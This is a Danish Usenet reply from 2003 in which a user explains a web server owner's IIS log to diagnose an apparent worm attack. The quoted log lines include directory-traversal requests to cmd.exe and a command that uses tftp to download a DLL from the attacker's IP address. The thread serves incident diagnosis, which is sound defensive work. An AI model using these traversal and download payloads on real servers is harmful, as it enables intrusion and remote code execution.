mange tak....det skal siges at serveren nu er fuldt opdateret....spændende
at se om det sker igen.....
"dudsen" <dudsen@gjk.dk> skrev i en meddelelse
news:b39776$f9m$1@sunsite.dk...
> McBrain wrote:
>
> > er det her en der har hacket min webserver?....min ip er xxxxxxxx?
>
> Her er lige en gennemgang af hvad der rent faktisk vises i loggen.
>
> > 2003-02-21 14:33:17 80.236.81.176 - xxxxxxxxxx 80 GET
> > /scripts/root.exe /c+dir 404 -
>
> Den returmere en "404 file not found" altså severen vil/kan ikke finde
> den fil.
>
> > 2003-02-21 14:33:23 80.236.81.176 - xxxxxxxxxx 80 GET
> > /MSADC/root.exe /c+dir 403 -
>
> Den retunerer en "403 Forbidden" altså severen vil ikke udføre
> forespøgslen.
> > 2003-02-21 14:33:39 80.236.81.176 - xxxxxxxxxx 80 GET
> > /scripts/..%5c../winnt/system32/cmd.exe /c+dir 200 -
>
> Av av den ville godt give klienten adgang til cmd.exe.
> koden er 200 OK
>
> > 2003-02-21 14:34:31 80.236.81.176 - xxxxxxxxxx 80 GET
> > /scripts/..%5c../winnt/system32/cmd.exe
> > /c+tftp%20-i%2080.236.81.176%20GET%20cool.dll%20c:\httpodbc.dll 502
> > -
>
> Yderligere fårsøg jeg ved ikke nok om hvordan orme virker til at sige
> hvad der sker men jeg kan ikke lide den 502 "Bad Gateway" Der
> indikere at serveren har forsøgt at udføre forespøgslen.
>
> > 2003-02-21 14:36:23 80.236.81.176 - xxxxxxxxxx 80 GET
> > /scripts/..%5c../httpodbc.dll - 500 -
>
> Ny forespøgsels type denne gang med en "500 Internal server Error" til
> følge.
>
> > 2003-02-21 18:19:23 80.198.58.140 - xxxxxxxxxx 80 GET
> > /ocsc-title.jpg - 304
> > Mozilla/4.0+(compatible;+MSIE+5.01;+Windows+NT+5.0)
>
> Legitim forespøgsel "304 Not Modified" någet proxy haløg den fortæller
> klienten at den ikke behøver opdatere igen.
>
> > 2003-02-21 18:20:18 80.198.58.140 - xxxxxxxxxx 80 GET /downloads.htm
> > - 200 Mozilla/4.0+(compatible;+MSIE+5.01;+Windows+NT+5.0)
>
> well denne her gang er vi tilfredse med en 200OK endnu en tilfreds
> bruger
>
> 40x fejl er "sikre" nok de indikere ikke et hul.
> Det di indkere er at fok spørger efter sider du ikke har det bør
> indholds udviklerne værre opmærsom på hvis det da er legitime
> forespøgsler.
> 200 tjaa den må ikke give adgang til cmd.exe eller for den sags skyld
> noget som helst uden for det bibliotek du har dine html filer.
> 304 samme som med 200
> 50x Betyder at den har fårsøgt at udføre en handling men har fejlet
> altså noget er galt.
> Det behøver ikke betyde at serveren har det dårligt eller er sårbar.
> Men det kan det gøre.
>
http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html for udybende
> svar.
>
> --
> Daniel Udsen
> Jorden gik under i går